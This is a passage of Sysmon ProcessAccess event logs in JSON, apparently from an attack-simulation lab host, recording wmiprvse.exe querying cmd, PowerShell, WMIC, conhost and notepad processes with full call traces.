T4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:21.503","SourceProcessGUID":"{41C8662E-20D1-5F25-0000-001016430800}","SourceProcessId":"4288","SourceThreadId":"5088","SourceImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","TargetProcessGUID":"{41C8662E-20D7-5F25-0000-00105BE20800}","TargetProcessId":"1592","TargetImage":"C:\\Windows\\system32\\conhost.exe","GrantedAccess":"0x1410","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","EventReceivedTime":"2020-08-01 07:59:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:21","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5834,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:21.503\r\nSourceProcessGUID: {41C8662E-20D1-5F25-0000-001016430800}\r\nSourceProcessId: 4288\r\nSourceThreadId: 5088\r\nSourceImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nTargetProcessGUID: {41C8662E-20D7-5F25-0000-0010ADE40800}\r\nTargetProcessId: 4360\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1410\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:21.503","SourceProcessGUID":"{41C8662E-20D1-5F25-0000-001016430800}","SourceProcessId":"4288","SourceThreadId":"5088","SourceImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","TargetProcessGUID":"{41C8662E-20D7-5F25-0000-0010ADE40800}","TargetProcessId":"4360","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1410","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","EventReceivedTime":"2020-08-01 07:59:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:21","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5835,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:21.503\r\nSourceProcessGUID: {41C8662E-20D1-5F25-0000-001016430800}\r\nSourceProcessId: 4288\r\nSourceThreadId: 5088\r\nSourceImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nTargetProcessGUID: {41C8662E-20D7-5F25-0000-00106CE50800}\r\nTargetProcessId: 4884\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1410\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:21.503","SourceProcessGUID":"{41C8662E-20D1-5F25-0000-001016430800}","SourceProcessId":"4288","SourceThreadId":"5088","SourceImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","TargetProcessGUID":"{41C8662E-20D7-5F25-0000-00106CE50800}","TargetProcessId":"4884","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1410","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","EventReceivedTime":"2020-08-01 07:59:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:21","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5836,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:21.503\r\nSourceProcessGUID: {41C8662E-20D1-5F25-0000-001016430800}\r\nSourceProcessId: 4288\r\nSourceThreadId: 5088\r\nSourceImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nTargetProcessGUID: {41C8662E-20D7-5F25-0000-001081F10800}\r\nTargetProcessId: 3496\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1410\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:21.503","SourceProcessGUID":"{41C8662E-20D1-5F25-0000-001016430800}","SourceProcessId":"4288","SourceThreadId":"5088","SourceImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","TargetProcessGUID":"{41C8662E-20D7-5F25-0000-001081F10800}","TargetProcessId":"3496","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1410","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","EventReceivedTime":"2020-08-01 07:59:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:21","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5837,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:21.503\r\nSourceProcessGUID: {41C8662E-20D1-5F25-0000-001016430800}\r\nSourceProcessId: 4288\r\nSourceThreadId: 5088\r\nSourceImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nTargetProcessGUID: {41C8662E-20D8-5F25-0000-001089080900}\r\nTargetProcessId: 1052\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1410\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:21.503","SourceProcessGUID":"{41C8662E-20D1-5F25-0000-001016430800}","SourceProcessId":"4288","SourceThreadId":"5088","SourceImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","TargetProcessGUID":"{41C8662E-20D8-5F25-0000-001089080900}","TargetProcessId":"1052","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1410","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","EventReceivedTime":"2020-08-01 07:59:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:21","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5838,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:21.503\r\nSourceProcessGUID: {41C8662E-20D1-5F25-0000-001016430800}\r\nSourceProcessId: 4288\r\nSourceThreadId: 5088\r\nSourceImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nTargetProcessGUID: {41C8662E-20D9-5F25-0000-0010E52F0900}\r\nTargetProcessId: 4428\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1410\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:21.503","SourceProcessGUID":"{41C8662E-20D1-5F25-0000-001016430800}","SourceProcessId":"4288","SourceThreadId":"5088","SourceImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","TargetProcessGUID":"{41C8662E-20D9-5F25-0000-0010E52F0900}","TargetProcessId":"4428","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1410","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","EventReceivedTime":"2020-08-01 07:59:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:21","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5839,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:21.503\r\nSourceProcessGUID: {41C8662E-20D1-5F25-0000-001016430800}\r\nSourceProcessId: 4288\r\nSourceThreadId: 5088\r\nSourceImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nTargetProcessGUID: {41C8662E-20D9-5F25-0000-0010B1300900}\r\nTargetProcessId: 3896\r\nTargetImage: C:\\Windows\\System32\\Wbem\\WMIC.exe\r\nGrantedAccess: 0x1410\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:21.503","SourceProcessGUID":"{41C8662E-20D1-5F25-0000-001016430800}","SourceProcessId":"4288","SourceThreadId":"5088","SourceImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","TargetProcessGUID":"{41C8662E-20D9-5F25-0000-0010B1300900}","TargetProcessId":"3896","TargetImage":"C:\\Windows\\System32\\Wbem\\WMIC.exe","GrantedAccess":"0x1410","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","EventReceivedTime":"2020-08-01 07:59:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:21","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5840,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:21.503\r\nSourceProcessGUID: {41C8662E-20D1-5F25-0000-001016430800}\r\nSourceProcessId: 4288\r\nSourceThreadId: 5088\r\nSourceImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nTargetProcessGUID: {41C8662E-20D6-5F25-0000-00107FD70800}\r\nTargetProcessId: 4508\r\nTargetImage: C:\\Windows\\system32\\notepad.exe\r\nGrantedAccess: 0x1\r\nCallTrace: 